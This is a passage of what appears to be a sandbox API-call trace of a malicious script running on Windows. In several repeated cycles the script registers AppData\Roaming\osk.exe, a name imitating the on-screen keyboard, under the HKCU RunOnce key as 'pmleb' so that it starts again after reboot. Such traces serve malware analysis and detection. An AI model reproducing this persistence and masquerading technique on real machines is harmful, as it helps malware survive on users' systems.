FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.265] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x69 [0082.265] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.265] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6a [0082.266] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.266] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x69 [0082.266] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.266] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.266] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.266] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.266] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.266] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.267] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.267] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.267] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.267] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.267] RegCloseKey (hKey=0x280) returned 0x0 [0082.267] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.267] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.267] SetTimer (hWnd=0x20280, nIDEvent=0x20e5, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e5 [0082.267] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.280] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.280] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.280] KillTimer (hWnd=0x20280, uIDEvent=0x20e5) returned 1 [0082.280] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.280] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.281] IUnknown:Release (This=0x787518) returned 0x1 [0082.281] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.281] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.281] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.281] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.281] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6a [0082.282] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.282] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6b [0082.282] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.283] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6a [0082.283] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.283] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.283] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.283] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.283] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.283] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.283] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.284] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.284] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.284] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.284] RegCloseKey (hKey=0x280) returned 0x0 [0082.284] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.284] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.284] SetTimer (hWnd=0x20280, nIDEvent=0x20e6, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e6 [0082.285] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.295] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.295] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.296] KillTimer (hWnd=0x20280, uIDEvent=0x20e6) returned 1 [0082.296] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.296] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.296] IUnknown:Release (This=0x787518) returned 0x1 [0082.296] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.296] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.296] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.297] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.297] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.297] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.297] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.297] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.297] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.297] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6b [0082.297] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.297] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6c [0082.297] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.298] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6b [0082.298] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.298] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.298] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.298] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.298] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.298] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.298] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.298] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.299] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.299] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.299] RegCloseKey (hKey=0x280) returned 0x0 [0082.299] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.299] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.299] SetTimer (hWnd=0x20280, nIDEvent=0x20e7, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e7 [0082.299] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.311] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.311] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.311] KillTimer (hWnd=0x20280, uIDEvent=0x20e7) returned 1 [0082.311] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.312] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.312] IUnknown:Release (This=0x787518) returned 0x1 [0082.312] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.312] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.312] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", 